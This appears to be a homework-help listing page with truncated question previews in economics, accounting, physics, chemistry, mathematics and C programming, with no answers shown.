Monopolistic competition differs from perfect competition primarily because in monopolistic competition, entry into the industry is blocked. in monopolistic competition, there are relatively few barriers to entry. in monopolistic competition, firms can differentiate their products. in perfect compet...
C Question: Write a function p3 which receives a C string as a parameter, and an...
C Question: Write a function p3 which receives a C string as a parameter, and an array of integers which will serve as indices into the string. The third parameter is the length of the integer array. The function jumbles the characters in the string according to the indices in the array of numbers. ...
Condition Present | Condition Absent | Row Total
Test Result +: 110 | 20 | 130
Test Result -: 20 | 50 | 70
Column Total: 130 | 70 | 200
Assume the sample is representative of the entire population. For a person selected at random, compute the following probabilities: (a) P(+ condition present); this is known as the sensitiv...
1. The plans of management are expressed formally in: A. the annual report to shareholders. B....
1. The plans of management are expressed formally in: A. the annual report to shareholders. B. Form 10-Q submitted to the Securities and Exchange Commission. C. performance reports. D. budgets. 2. Which of the following statements is correct? A. Managerial accounting is focused on precision. B. Mana...
2. A 0.060 kg tennis ball, moving with a speed of 5.28 m/s, has a head-on...
2. A 0.060 kg tennis ball, moving with a speed of 5.28 m/s, has a head-on collision with a 0.080 kg ball initially moving in the same direction at a speed of 3.00 m/s. Assume that the collision is perfectly elastic. Determine the velocity (speed and direction) of both the balls after the collision....
1) Let f(x) = x^3, and g(x) = 2x. Determine f(g(1)). 2) Enter the formula for...
1) Let f(x) = x^3, and g(x) = 2x. Determine f(g(1)). 2) Enter the formula for a sine function with an amplitude of 5, a period of 90 degrees, a shift of 45 degrees to the right and 3 units upwards. Determine the exact value of the expression sin(v) + cos(v) given that tan(v) = 7/3. 3) Solve the ...
Warnerwoods Company uses a perpetual inventory system. It entered into the following purchases and sales transactions...
Warnerwoods Company uses a perpetual inventory system. It entered into the following purchases and sales transactions for March Units sold at Retail Date Activities Mar. 1 Beginning inventory Mar 5 Purchase Mar. 9 Sales Mar. 18 Purchase Mar. 25 Purchase Mar. 29 Sales Totals Units Acquired at Cost 24...
Find the angle formed when [3, 4] and [−5, 12] are placed tail-to-tail, then find components for the vector projection that results when [3, 4] is projected onto [−5, 12]...
Why does electronegativity increase across a period?...
Demand Curve & Consumer Surplus. Assume the price for puppies is $200. 1. What is the...
Demand Curve & Consumer Surplus. Assume the price for puppies is $200. 1. What is the buyer's optimal (best) quantity demanded, Qd? 2. What area shows the buyer's net gain or 'Consumer Surplus'? 3. What area shows the buyer's Total Dollar Value (Total Willingness to Pay)?...